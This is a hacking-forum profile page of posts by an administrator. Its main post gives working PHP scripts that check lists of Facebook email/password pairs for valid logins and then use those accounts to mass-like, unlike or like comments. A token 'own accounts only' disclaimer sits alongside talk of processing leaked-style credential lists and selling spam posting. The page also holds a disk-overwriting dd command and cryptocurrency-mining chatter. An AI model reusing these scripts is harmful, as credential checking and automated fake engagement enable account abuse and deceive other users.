Jump to content

Zatarra

Administrators
  • Posts

    2637
  • Joined

  • Last visited

  • Days Won

    89

Everything posted by Zatarra

  1. Daca tu faci banii asa usor.. de ce mai lucreaza lumea?
  2. In httpd.conf you can use AllowOverride None instead of AllowOverride all. With this feature you can not use this bug.
  3. Zatarra

    Bsod

    Copiaza-ti tot ce ai de copiat pe disk sau hard extern apoi dai comanda asta in Linux: dd if=/dev/zero of=/dev/hda bs=512 count=1 Dupa ce ai dat, baga DVD-ul cu Windows, dai reboot si instaleaza Windows-ul. Bafta Sugestie: Creaza-ti un stick cu un Linux "Live CD" inainte de a face toate acestea
  4. Ma bucur ca ai trecut pe la noi. Te mai asteptam
  5. Trade?
  6. Lasa frate omul in pace el crede ca totul e chiar atat de usor
  7. Pe 1337 l-am rezolvat eu. Ip-ul lui era in blackhole si l-am scos
  8. Procesoarele care le-ai mentionat tu toate scot peste 2. Nu stiu ce miner folosesti tu.
  9. 100 de euro si ti-l fac sa posteze in toate grupurile in care e un cont.
  10. Faci curs si iti dai certificare ITIL v3 Foundation. Idea in ITIL ii sa intelegi si sa respecti procesul, nu sa profiti de punctele sale slabe. Toate firmele din domeniu IT care ofera customer support merg pe ITIL deoarece este cel mai bine structurat proces de rezolvare a problemelor/incidentelor in domeniul enterprise.
  11. Spune-le sa escaleze problema. Si ei lucreaza dupa modelul ITIL si nu stiu ce-mi face impresia ca tu ai parte doar de Stupid Level 1 Support
  12. Cam same shit.. nu se merita daca nu ai procesoare dedicate (ASIC-uri sau FPGA-uri) sau macar GPU-uri multe
  13. 7e75d374c3baa8ea1390594f797ab194 1 day 21 hour Available
  14. Gadeste-te ca la 350 MH/s scoti 0.35 euro pe zi. Un procesor de 2.2 MHz scoate cam 2.2 MH/s. Faci tu calculele mai departe
  15. Depinde cum vrei. Daca vrei sa folosesti CPU iti recomand cpuminer. Daca vrei sa folosesti GPU poti incerca cu cgminer
  16. Am raportat acum ceva vreme 2 XSS-uri in RH. Unu l-au reparat si mi-au oferit creditele pentru el, celalalt l-au confirmat si vor specifica cand este reparat. https://access.redhat.com/site/articles/66234
  17. De ce ce as vrea sa-mi tin facebookul privat? Si apropo, e Adrian, nu Andrei Ontopic: 64aa5a8f227b0a9542d33fc7dc7852ec 1 day 21 hour Available
  18. Da, dupa cum spune si EAdrian nu il verifica nimeni si nu-i pasa facebookului pe cate conturi intri de pe un IP. De retinut totusi daca folositi aceste scripturi pentru concursuri care sunt prin APP (aplicatiile de la facebook) sunt sanse mari sa fiti descalificati deoarece acestea sunt Third party si inregistreaza IP-ul folosit pentru vot sau alta metoda de partajare
  19. https://www.facebook.com/permalink.php?id=295538893896991&story_fbid=352318578221976 Pe cea de azi eu am luat-o
  20. Nu este pe partea de WEB. Totul este CLI (consola). Copiezi codul php in fisiser numit verifier.php (spre exemplu) si apoi urci prin ftp pe serverul tau. La fel faci si cu users.txt. Dupa ce ai urcat fisierele intri in consola serverului (SSH pe portul 22 sau oricare alt port setat la SSH) si urmezi pasii mai departe, adica dai php verifier.php
  21. 1. Like la poza va fi implementat. 2. De ce ai avea nevoie de proxy?
  22. Poti schimba orice lista cu find and replace (Control + H in notepad) si inlocuiesti : cu " ". Ma indoiesc ca multi oameni au : in parola pentru a "scapa" verificarii Edit: Comment autoliker adaugat.
  23. Incearca pe un server unde nu ai safe_mode on [root@OptimusPrime RST]# cat /etc/php.ini |grep "safe_mode =" safe_mode = Off sql.safe_mode = Off [root@OptimusPrime RST]#
  24. Salut baieti, Nu prea vin eu cu multe contributii pe forum, dar sper sa va ajute. Aveti urmatoarele fisiere: I. verifier.php (Verifica o lista de conturi - users.txt - si selecteaza conturile "bune") <?php /* ######################################################### # Copyright to Zatarra @ rstforums.com # # Use it only with your own accounts! # ######################################################### */ //Initializing cookies folder $directory=getcwd()."/cookies"; //Checking if cookies folder exists if (file_exists($directory)) { //Eating all the cookies to avoid problems echo shell_exec("rm -rf cookies/*.cookie"); } else { //Creating directory echo shell_exec("mkdir cookies"); } $goodone=0; $badone=0; $var=file('users.txt'); for ($i=0;$i<count($var);$i++) { $fb=explode(" ",trim($var[$i])); $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, "https://login.facebook.com/login.php?m&next=http://m.facebook.com/home.php"); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_POST, 1); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($curl, CURLOPT_POSTFIELDS, "email=" . @trim($fb[0]) . "&pass=" . @trim($fb[1]) . "&login=Log In"); curl_setopt($curl, CURLOPT_ENCODING, ""); curl_setopt($curl, CURLOPT_COOKIEJAR, "cookies/$i.cookie"); curl_setopt($curl, CURLOPT_COOKIEFILE, "cookies/$i.cookie"); $curlData = curl_exec($curl); $curlData = curl_exec($curl); @preg_match_all('/data-sigil=(.*?)\>\<table/',$curlData,$rasp); if (@$rasp[1][0]) { echo "[RST] Goodone => ".trim($fb[0])." ".trim($fb[1])."\n"; $goodone++; } /* else { echo "[RST] Badone => ".trim($fb[0])." - ".trim($fb[1])."\n"; $badone++; } */ } echo "Am verificat ".count($var)." conturi dintre care $goodone au fost bune\n"; //Eating all the cookies echo shell_exec("rm -rf cookies/*.cookie"); ?> Metoda de folosire: 1. Creati un fisier users.txt care sa aibe in el, pe fiecare linie, un user (email) si o parola sub forma aceasta: email1@yahoo.com pass1 email2@yahoo.com pass2 email3@yahoo.com pass3 2. Executati fisierul creat anterior (verifier.php) astfel: [root@OptimusPrime RST]# php verifier.php [RST] Goodone => email1@yahoo.com pass1 [RST] Goodone => email2@yahoo.com pass2 [RST] Goodone => email3@yahoo.com pass3 Am verificat 3 conturi dintre care 3 au fost bune [root@OptimusPrime RST]# 3. Toate conturile cu Goodone sunt bune si pot fi folosite pentru script-urile viitoare. Tineti cont de urmatorul fapt: un account este "folosibil" dar daca are urmatoarea setare in facebook: II. like.php (Ofera like-uri unei pagini de facebook - sau unui link - cu conturile predefinite in users.txt) <?php /* ######################################################### # Copyright to Zatarra @ rstforums.com # # Use it only with your own accounts! # ######################################################### */ //The link variable is the only one you have to modify!!! Leave the rest as it is in order to work. $link='https://www.facebook.com/rstforums'; //Initializing cookies folder $directory=getcwd()."/cookies"; //Checking if cookies folder exists if (file_exists($directory)) { //Eating all the cookies to avoid problems echo shell_exec("rm -rf ./cookies/*.cookie"); } else { //Creating directory echo shell_exec("mkdir cookies"); } //Initializing users and passwords $user=file('users.txt'); function login($username,$password) { $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, "https://login.facebook.com/login.php?m&next=http://m.facebook.com/home.php"); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_POST, 1); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($curl, CURLOPT_POSTFIELDS, "email=" . @$username . "&pass=" . @$password . "&login=Log In"); curl_setopt($curl, CURLOPT_ENCODING, ""); curl_setopt($curl, CURLOPT_COOKIEJAR, "cookies/$username.cookie"); curl_setopt($curl, CURLOPT_COOKIEFILE, "cookies/$username.cookie"); $curlData = curl_exec($curl); $curlData = curl_exec($curl); @preg_match_all('/name=\"fb_dtsg\" value=\"(.*?)\"/',$curlData,$dtsg); //echo "dtsg => ".$dtsg[1][0]."\n"; @preg_match_all('/\"id\":\"(.*?)\"\}\,/',$curlData,$userid); //echo "Profile Id => ".$userid[1][0]."\n"; @preg_match_all('/data-sigil=(.*?)\>\<table/',$curlData,$rasp); if (@$rasp[1][0]) { return array(0,0); } else { return array($dtsg[1][0],$userid[1][0]); } } function like($username,$password,$link) { $userdetails=login($username,$password); if ($userdetails[0]!='0') { $data='fb_dtsg='.$userdetails[0].'&href='.$link.'&action=like&nobootload=&iframe_referer=http://rstforums.com/&ref=&__user='.$userdetails[1].'&__a=1&__dyn=7w&__req=1&ttstamp=265816673977571105'; $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, "https://www.facebook.com/plugins/like/connect"); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_POST, 1); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($curl, CURLOPT_POSTFIELDS, $data); curl_setopt($curl, CURLOPT_ENCODING, ""); curl_setopt($curl, CURLOPT_COOKIEFILE, "cookies/$username.cookie"); $curlData = curl_exec($curl); $curlData = curl_exec($curl); } } for ($i=0;$i<count($user);$i++) { $fb=explode(" ",trim($user[$i])); like($fb[0],$fb[1],$link); like($fb[0],$fb[1],$link); } //Eating all the cookies echo shell_exec("rm -rf cookies/*.cookie"); ?> Metoda de folosire: 1. Dupa cum scrie si in cod, singurul parametru pe care va indic sa-l modificati este variabila $link 2. Inainte de rulare, puteti sa verificati numarul de like-uri la pagina voastra aici: https://graph.facebook.com/?ids=https://www.facebook.com/rstforums 3. Dupa modificarea link-ului rulati fara nici un argument in consola php like.php 4. Dupa ce s-a oprit reverificati numarul de like-uri. III. dislike.php (Ofera dislike-uri unei pagini de facebook - sau unui link - cu conturile predefinite in users.txt) <?php /* ######################################################### # Copyright to Zatarra @ rstforums.com # # Use it only with your own accounts! # ######################################################### */ //The link variable is the only one you have to modify!!! Leave the rest as it is in order to work. $link='https://www.facebook.com/rstforums'; //Initializing cookies folder $directory=getcwd()."/cookies"; //Checking if cookies folder exists if (file_exists($directory)) { //Eating all the cookies to avoid problems echo shell_exec("rm -rf ./cookies/*.cookie"); } else { //Creating directory echo shell_exec("mkdir cookies"); } //Initializing users and passwords $user=file('users.txt'); function login($username,$password) { $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, "https://login.facebook.com/login.php?m&next=http://m.facebook.com/home.php"); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_POST, 1); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($curl, CURLOPT_POSTFIELDS, "email=" . @$username . "&pass=" . @$password . "&login=Log In"); curl_setopt($curl, CURLOPT_ENCODING, ""); curl_setopt($curl, CURLOPT_COOKIEJAR, "cookies/$username.cookie"); curl_setopt($curl, CURLOPT_COOKIEFILE, "cookies/$username.cookie"); $curlData = curl_exec($curl); $curlData = curl_exec($curl); @preg_match_all('/name=\"fb_dtsg\" value=\"(.*?)\"/',$curlData,$dtsg); //echo "dtsg => ".$dtsg[1][0]."\n"; @preg_match_all('/\"id\":\"(.*?)\"\}\,/',$curlData,$userid); //echo "Profile Id => ".$userid[1][0]."\n"; @preg_match_all('/data-sigil=(.*?)\>\<table/',$curlData,$rasp); if (@$rasp[1][0]) { return array(0,0); } else { return array($dtsg[1][0],$userid[1][0]); } } function like($username,$password,$link) { $userdetails=login($username,$password); if ($userdetails[0]!='0') { $data='fb_dtsg='.$userdetails[0].'&href='.$link.'&action=like&nobootload=&iframe_referer=http://rstforums.com/&ref=&__user='.$userdetails[1].'&__a=1&__dyn=7w&__req=1&ttstamp=265816673977571105'; $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, "https://www.facebook.com/plugins/like/disconnect"); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_POST, 1); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($curl, CURLOPT_POSTFIELDS, $data); curl_setopt($curl, CURLOPT_ENCODING, ""); curl_setopt($curl, CURLOPT_COOKIEFILE, "cookies/$username.cookie"); $curlData = curl_exec($curl); $curlData = curl_exec($curl); } } for ($i=0;$i<count($user);$i++) { $fb=explode(" ",trim($user[$i])); like($fb[0],$fb[1],$link); like($fb[0],$fb[1],$link); } //Eating all the cookies echo shell_exec("rm -rf cookies/*.cookie"); ?> Metoda de folosire: 1. Exact la fel ca si like.php 2. Partea cu dislike am facut-o pentru pur si simplul fapt ca sunt unii oameni nesimtiti care dupa ce ii ajuti te iau peste picior sau te ignora, in acest caz este foarte simplu si anume rulezi script-ul de dislike IV. commentlike.php (Da like commenturilor cu useri din users.txt) <?php /* ######################################################### # Copyright to Zatarra @ rstforums.com # # Use it only with your own accounts! # ######################################################### */ //The link variable is the only one you have to modify!!! Leave the rest as it is in order to work. $link='https://www.facebook.com/LinkToYourComment'; @preg_match_all('/sts\/([0-9]*?)\?comment/',$link,$postid); if (!@$postid[1][0]) { @preg_match_all('/fbid=([0-9]*?)\&set/',$link,$postid); } @preg_match_all("/comment_id=([0-9]*?)\&offset/",$link,$commentid); @preg_match_all("/a.([0-9]*?).([0-9]*?).([0-9]*?)\&/",$link,$photo); if (@$photo[2][0]) {$length=strlen($photo[2][0]);} else {$length=5;} //Initializing cookies folder $directory=getcwd()."/cookies"; //Checking if cookies folder exists if (file_exists($directory)) { //Eating all the cookies to avoid problems echo shell_exec("rm -rf ./cookies/*.cookie"); } else { //Creating directory echo shell_exec("mkdir cookies"); } //Initializing users and passwords $user=file('users.txt'); function login($username,$password) { $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, "https://login.facebook.com/login.php?m&next=http://m.facebook.com/home.php"); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_POST, 1); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($curl, CURLOPT_POSTFIELDS, "email=" . @$username . "&pass=" . @$password . "&login=Log In"); curl_setopt($curl, CURLOPT_ENCODING, ""); curl_setopt($curl, CURLOPT_COOKIEJAR, "cookies/$username.cookie"); curl_setopt($curl, CURLOPT_COOKIEFILE, "cookies/$username.cookie"); $curlData = curl_exec($curl); $curlData = curl_exec($curl); @preg_match_all('/name=\"fb_dtsg\" value=\"(.*?)\"/',$curlData,$dtsg); //echo "dtsg => ".$dtsg[1][0]."\n"; @preg_match_all('/\"id\":\"(.*?)\"\}\,/',$curlData,$userid); //echo "Profile Id => ".$userid[1][0]."\n"; @preg_match_all('/data-sigil=(.*?)\>\<table/',$curlData,$rasp); if (@$rasp[1][0]) { return array(0,0); } else { return array($dtsg[1][0],$userid[1][0]); } } function likecomment($username,$password,$fpostid,$fcommentid,$flength) { $userdetails=login($username,$password); if ($userdetails[0]!='0') { if ($flength==5) { $data='comment_id='.$fpostid.'_'.$fcommentid.'&legacy_id='.$fcommentid.'&like_action=true&ft_ent_identifier='.$fpostid.'&source=2&client_id=1375725162708%3A3550641995&ft[tn]=%3ER0]&__user='.$userdetails[1].'&__a=1&__dyn=7n8ahyj35CFUSt2u5FeDKd8q&__req=q&fb_dtsg='.$userdetails[0].'&ttstamp=26581665371788481'; } else { $data='comment_id='.$fpostid.'_'.$fcommentid.'&legacy_id='.$fcommentid.'&like_action=true&ft_ent_identifier='.$fpostid.'&source=2&client_id=1375725162708%3A3550641995&ft[tn]=%3ER0]&ft[type]=44&nctr[_mod]=photos_snowlift&__user='.$userdetails[1].'&__a=1&__dyn=7n8ahyj35CFUSt2u5FeDKd8q&__req=s&fb_dtsg='.$userdetails[0].'&ttstamp=26581665371788481'; } $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, "https://www.facebook.com/ajax/ufi/comment_like.php"); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_POST, 1); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($curl, CURLOPT_POSTFIELDS, $data); curl_setopt($curl, CURLOPT_ENCODING, ""); curl_setopt($curl, CURLOPT_COOKIEFILE, "cookies/$username.cookie"); $curlData = curl_exec($curl); $curlData = curl_exec($curl); echo $curlData; } } for ($i=0;$i<count($user);$i++) { $fb=explode(" ",trim($user[$i])); likecomment($fb[0],$fb[1],@$postid[1][0],@$commentid[1][0],$length); likecomment($fb[0],$fb[1],@$postid[1][0],@$commentid[1][0],$length); } //Eating all the remain cookies echo shell_exec("rm -rf cookies/*.cookie"); ?> Metoda de folosire: 1. Exact ca la like si dislike doar ca de aceasta data link-ul introdus il luati astfel: Copy la share time 2. Exemplu de copiere al link-ului 3. Atentie, functioneaza doar pentru commenturi nu si posturi pe wall 4. E foarte probabil sa gasiti exceptii. Va rog sa le postati si le voi rezolva Ce va urma in aces thread vor fi urmatoarele: 1. Like la comment - adaugat 2. Like la post pe wall 3. Like la poza 4. Share la un articol Postati orice alta idee in acest thread iar cei care sunt pasionati sau interesati de acest subiect sa ma caute printr-un PM, poate facem o echipa si punem mai multe idei cap la cap. Astept feedback-ul vostru.
×
×
  • Create New...